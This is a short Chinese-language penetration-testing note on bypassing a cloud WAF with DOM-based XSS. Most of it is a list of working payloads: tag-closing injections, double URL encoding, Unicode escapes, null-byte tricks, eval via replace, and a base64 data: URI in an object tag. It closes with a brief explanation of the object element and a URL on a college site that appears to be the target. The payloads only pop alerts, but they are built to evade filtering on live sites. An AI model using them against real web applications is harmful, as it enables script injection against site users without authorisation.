渗透实战 dom型XSS绕过云平台waf防护

输入">，构造闭合

"><audio src=1 onerror=alert(/xss/);>"><audio src=1 onerror=prompt('xss');>
<--!//html编码+非编码混合-->
">&lt;img  longdesc="src=" images="" stop.png"="" onerror="alert(document.domain);//&amp;quot;" src="x" alt="showme"&gt;"><[%00]img onerror=alert(1) src=a>
<--!url双编码--> %2522%253E%253Cimg%2520onerror=alert(1)%2520src=a%253E
<--!Unicode编码、使用js转义、Unicode转义可以用于表示js关键词中的字符-->
"><%00EEEE<svg ////ONLoad='au006cu0065u0072u0074(1)'///>svg>%0APayload"><html " onmouseover=/*&lt;svg/*/onload=alert(2)//>
<--!纯HTML编码-->
&quot;&gt;&lt;html &quot; onmouseover=/*&amp;lt;svg/*/onload=alert(2)//&gt;
<--!eval-->
">`<script>'alert(1)'.replace(/.+/,eval)</script>`

"><ijavascriptmg+src+ojavascriptnerror=confirm(1)>">    <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4="></object>

"><object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
简单解释一下：其中PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==为base64编码的<script>alert(1)</script>
object定义和用法--脚本伪协议
定义一个嵌入的对象。请使用此元素向您的 XHTML 页面添加多媒体。此元素允许您规定插入 HTML 文档中的对象的数据和参数，以及可用来显示和操作数据的代码。
<object> 标签用于包含对象，比如图像、音频、视频、Java applets、ActiveX、PDF 以及 Flash。
object 的初衷是取代 img 和 applet 元素。不过由于漏洞以及缺乏浏览器支持，这一点并未实现。
浏览器的对象支持有赖于对象类型。不幸的是，主流浏览器都使用不同的代码来加载相同的对象类型。
而幸运的是，object 对象提供了解决方案。如果未显示 object 元素，就会执行位于 <object> 和 </object> 之间的代码。通过这种方式，我们能够嵌套多个 object 元素（每个对应一个浏览器）。

http://www.fjcpc.edu.cn/jgdzz/2020/0424/c2231a65107/page.htm